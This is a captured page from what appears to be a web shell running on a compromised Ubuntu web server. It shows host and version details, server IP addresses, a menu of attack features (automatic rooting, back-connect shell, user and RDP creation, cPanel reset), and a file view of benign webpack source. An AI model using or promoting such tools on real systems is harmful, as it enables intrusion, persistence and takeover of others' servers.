Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
webpack /
lib /
web /
[ HOME SHELL ]
Name
Size
Permission
Action
FetchCompileAsyncWasmPlugin.js
1.97
KB
-rw-rw-rw-
FetchCompileWasmPlugin.js
2.3
KB
-rw-rw-rw-
JsonpChunkLoadingPlugin.js
3.37
KB
-rw-rw-rw-
JsonpChunkLoadingRuntimeModule...
16.59
KB
-rw-rw-rw-
JsonpTemplatePlugin.js
1.21
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : JsonpTemplatePlugin.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Tobias Koppers @sokra */ "use strict"; const ArrayPushCallbackChunkFormatPlugin = require("../javascript/ArrayPushCallbackChunkFormatPlugin"); const EnableChunkLoadingPlugin = require("../javascript/EnableChunkLoadingPlugin"); const JsonpChunkLoadingRuntimeModule = require("./JsonpChunkLoadingRuntimeModule"); /** @typedef {import("../Chunk")} Chunk */ /** @typedef {import("../Compilation")} Compilation */ /** @typedef {import("../Compiler")} Compiler */ class JsonpTemplatePlugin { /** * @deprecated use JsonpChunkLoadingRuntimeModule.getCompilationHooks instead * @param {Compilation} compilation the compilation * @returns {JsonpChunkLoadingRuntimeModule.JsonpCompilationPluginHooks} hooks */ static getCompilationHooks(compilation) { return JsonpChunkLoadingRuntimeModule.getCompilationHooks(compilation); } /** * Apply the plugin * @param {Compiler} compiler the compiler instance * @returns {void} */ apply(compiler) { compiler.options.output.chunkLoading = "jsonp"; new ArrayPushCallbackChunkFormatPlugin().apply(compiler); new EnableChunkLoadingPlugin("jsonp").apply(compiler); } } module.exports = JsonpTemplatePlugin;
Close